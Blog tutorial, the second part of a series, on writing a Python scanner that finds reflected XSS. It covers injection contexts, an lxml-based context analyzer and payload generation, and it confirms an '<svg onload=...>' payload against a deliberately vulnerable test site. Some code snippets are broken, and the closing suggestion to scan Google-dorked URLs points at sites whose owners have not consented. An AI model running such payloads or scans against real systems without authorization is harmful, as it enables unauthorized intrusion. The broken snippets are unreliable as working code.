Writing a scanner to find reflected XSS vulnerabilities — Part 2

Hungrysoul
4 min readApr 27, 2020

--

In my previous blog post, we have learned how to write a request parser and then an initial prober. In this post, we will be writing the rest of the modules to create a working XSS scanner.

Definitely agree that building a context analyzer is the most difficult part but when we know exactly how it should work it’s going to get a bit easier.

Type of XSS reflections and their escapes

HTML Tags: <> characters are required to construct a payload.

HTML Attribute Name: space, and = are required “ and ‘ are optional

HTML Attribute Value: Direct payload or “, ‘ are required to escape and construct a payload

HTML Text Node: <> characters are required to escape textarea and construct a payload

HTML Comments: <>! characters are required to escape comments and construct a payload

Style: <> characters are required to escape style and construct a payload

Style Attribute: <,>,” characters are required to escape textarea and construct a payload

Href Attribute: direct payload or “ are required to escape textarea and construct a payload

JS node: <, > is required to escape script. Or other special characters to escape a JS variable or function.

Note: we are not building an advanced scanner to cover all contexts.

To write a context analyzer we are going to use a package called LXML that parses HTML into an XML tree.

pip3 install lxml

We will write a class that takes in a raw HTML response, converts it into an XML tree, searches for a string, and then returns back a list of contexts.

For example, execute the following code

from lxml import htmlstring = "<html><body><h1>teyascan</h1></body></html>"
search_string = "teyascan"
page_html_tree = html.fromstring(string)
xpath = '//*[contains(text(),\'' + search_string + '\')]'
n = page_html_tree.xpath(xpath)
if len(n):
print("INPUT IS REFLECTED BACK INSIDE HTML TAG CONTEXT")

You will see an output like the following

(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
INPUT IS REFLECTED BACK INSIDE HTML TAG CONTEXT

In the above code, you can see that a raw HTML string is parsed and converted into an XML tree. Later we search the XML tree using regex to find context in which the string has been reflected.

Here is the full code that covers most of the contexts.

Note: The above code is heavily inspired by an open-source project which I don’t remember of

Save the code as context_analyzer.py and execute it

(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
{'payload': 'teyascan', 'contexts': [{'type': 'text', 'count': 1}]}
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>

Great! Now we have successfully created a context analyzer. All that is left is to create payloads based on the context and confirm those payloads.

For this part, we are not going to use a list of payloads or anything but are just going to make the scanner smart enough.

Start by creating a new file called payload_generator.py and create function payload_generator. The function payload_generator takes contexts and returns back a list with regex to find in XML tree & the payload.

Execute the following code

with open("requests.txt", "rb") as f:
parser = RequestParser(f.read())
i_p = GetInsertionPoints(parser.request)

for request in i_p.requests:
response = send_request(request, "http")
if "teyascan" in response.text:
print("probe reflection found in "+request.insertion)
contexts = ContextAnalyzer.get_contexts(response.text, "teyascan")
final_payloads = []
for context in contexts["contexts"]:
print(context)
payloads = payload_generator(context['type'])
final_payloads.extend(payloads)
print(final_payloads)

The output would be

(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
{'type': 'htmltag', 'count': 1}
[{'payload': '<svg onload=prompt`812132`>', 'find': '//svg[@onload[contains(.,812132)]]'}]

AWESOME! We have successfully created a payload based on the context. The next thing would be sending a request with the payload and confirm if the payload is successful or not.

To do that we need to send an HTTP request, but this time instead of the probe string we send it with the payload. We start by copying the request using deepcopy.

dup = copy.deepcopy(request)

Then replacing “teyascan” in request params, headers, and body using

def replace(request, string, payload):

for k, v in request.headers.items():
k.replace(string, payload)
v.replace(string, payload)

for k, v in request.params.items():
request.params[k] = request.params[k].replace(string, payload)
for k, v in self.data.items():
request.data[k] = request.data[k].replace(string, payload)

Once that is done, we can send the request object by using send_request function we created in the tutorial one.

with open("requests.txt", "rb") as f:
parser = RequestParser(f.read())
i_p = GetInsertionPoints(parser.request)

for request in i_p.requests:
response = send_request(request, "http")
if "teyascan" in response.text:
print("probe reflection found in "+request.insertion)
contexts = ContextAnalyzer.get_contexts(response.text, "teyascan")
for context in contexts["contexts"]:
print(context)
payloads = payloadGenerator(context['type'])
for payload in payloads:
dup = copy.deepcopy(request)
dup.replace("teyascan", payload['payload'])
response = send_request(dup, "http")
page_html_tree = html.fromstring(response.text)
count = page_html_tree.xpath(payload['find'])
if len(count):
print("request vulnerable")
print(dup.headers)
http = MakeRawHTTP(dup)
print(http.rawRequest)

The output would be

(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
VULNERABLE TO XSS
POST /search.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://testphp.vulnweb.com
Connection: close
Referer: http://testphp.vulnweb.com/search.php?test=query
Upgrade-Insecure-Requests: 1
searchFor=asdas <svg onload=prompt`812132`>&goButton=go&

Repeating the request in browser to confirm the vulnerability

TADAAA! We have successfully automated finding of XSS

The tutorial code can be found at https://github.com/akhil-reni/xsstutorial

The scanner can be customized and used with various use cases like

  • Scrapping URLs from Wayback and scanning for XSS
  • Scrapping Google with dorks and scanning for XSS

--

--

Hungrysoul

Python Dev, Part time Bug Bounty Hunter & a Full time entrepreneur.